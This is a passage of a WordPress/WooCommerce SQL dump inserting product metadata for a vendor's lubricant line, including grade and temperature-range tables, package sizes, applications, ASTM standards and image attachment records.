INSERT INTO `wp_postmeta` VALUES (7839, 843, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7840, 843, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7841, 843, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7842, 843, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7843, 843, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7844, 843, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7845, 843, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7846, 843, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7847, 843, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7848, 843, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7849, 843, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7850, 843, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7851, 843, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7852, 843, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7853, 843, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7854, 843, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7855, 843, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7856, 843, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7857, 843, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7858, 843, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7859, 843, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7860, 843, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7861, 843, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7862, 843, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7863, 843, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7864, 843, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7865, 843, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7866, 843, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7867, 843, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7868, 843, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (7869, 843, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7870, 843, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7871, 843, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7872, 843, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7873, 843, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (7875, 843, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7876, 843, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7898, 843, '_thumbnail_id', '792'); 
INSERT INTO `wp_postmeta` VALUES (7899, 843, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7900, 843, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7901, 844, '_edit_lock', '1475591720:2'); 
INSERT INTO `wp_postmeta` VALUES (7902, 844, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7903, 844, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7904, 844, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7905, 844, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7906, 844, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7907, 844, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7908, 844, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7909, 844, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7910, 844, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7911, 844, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7912, 844, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7913, 844, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7914, 844, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7915, 844, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7916, 844, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7917, 844, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7918, 844, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7919, 844, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7920, 844, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7921, 844, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7922, 844, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7923, 844, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7924, 844, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7925, 844, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7926, 844, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7927, 844, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7928, 844, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7929, 844, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7930, 844, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7931, 844, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7932, 844, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7933, 844, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7934, 844, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (7935, 844, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7936, 844, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7937, 844, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7938, 844, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7939, 844, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (7940, 844, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7941, 844, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>NSF H-1 Rated</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7964, 845, '_wp_attached_file', '2016/08/shutterstock_333094712.jpg'); 
INSERT INTO `wp_postmeta` VALUES (7965, 845, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4500;s:6:"height";i:3000;s:4:"file";s:34:"2016/08/shutterstock_333094712.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_333094712-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_333094712-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_333094712-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_333094712-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_333094712-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_333094712-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_333094712-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_333094712-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (7967, 844, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7968, 844, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7969, 844, '_thumbnail_id', '699'); 
INSERT INTO `wp_postmeta` VALUES (7970, 846, '_edit_lock', '1475591689:2'); 
INSERT INTO `wp_postmeta` VALUES (7971, 846, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7972, 846, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7973, 846, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7974, 846, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7975, 846, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7976, 846, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7977, 846, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7978, 846, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7979, 846, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7980, 846, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7981, 846, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7982, 846, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7983, 846, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7984, 846, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7985, 846, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7986, 846, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7987, 846, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7988, 846, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7989, 846, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7990, 846, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7991, 846, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7992, 846, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7993, 846, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7994, 846, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7995, 846, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7996, 846, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7997, 846, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7998, 846, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7999, 846, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8000, 846, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8001, 846, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (8002, 846, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (8003, 846, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (8004, 846, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8005, 846, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8006, 846, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8007, 846, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8008, 846, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8009, 846, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8010, 846, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8033, 846, '_thumbnail_id', '703'); 
INSERT INTO `wp_postmeta` VALUES (8034, 846, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8035, 846, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8036, 847, '_edit_lock', '1475591770:2'); 
INSERT INTO `wp_postmeta` VALUES (8037, 847, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8038, 847, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8039, 847, '_stock_status', 'instock'); 
